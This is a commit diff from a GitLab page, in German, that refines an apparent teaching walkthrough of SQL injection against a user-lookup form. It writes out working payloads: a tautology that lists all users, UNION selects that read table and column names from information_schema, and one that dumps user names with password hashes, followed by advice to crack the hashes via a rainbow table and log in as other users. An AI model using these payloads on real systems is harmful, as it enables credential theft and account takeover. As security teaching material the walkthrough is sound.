Commit 1f981f3e authored by Georg Gottleuber's avatar Georg Gottleuber
Browse files

bessere Beschriebung des Wegs

parent 1303e973
# normale Benutzung # normale Benutzung
Eingabe: 1 Eingabe: `1`
# Hack # Hack 1: Injection-Test; alle Benutzer anzeigen
Eingabe `foo' or '0' = '0` zeigt alle Benutzer an Eingabe `1' or '0' = '0` zeigt alle Benutzer an
# Hack2 # Hack 2: Datenbankstrukur auslesen
Eingabe `foo' or '0' = '0' union select user,password from users where '0' = '0` zeigt alle Benutzer + Passworthash. Anzeigen aller Tabellennamen mit `foo' or 1=0 union select null, table_name from information_schema.tables where table_name like '%`
Anzeigen aller Spalten der Tabelle "users" mit `foo' or 1=0 union select null, column_name from information_schema.columns where table_name like 'users`
# Hack 3: Passwörter aller Benuter.innen hacken
Anzeigen aller Benuter mit zugehörigen Passworthashes: `foo' or '0' = '0' union select user,password from users where '0' = '0`
Die Passwörter können nun in einer Rainbowtable nachgeschaut werden (z.B. auf https://crackstation.net/ ) Die Passwörter können nun in einer Rainbowtable nachgeschaut werden (z.B. auf https://crackstation.net/ )
Nun kann man sich mit anderen Benutzerkennungen anmelden. Nun kann man sich mit anderen Benutzerkennungen anmelden.
Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment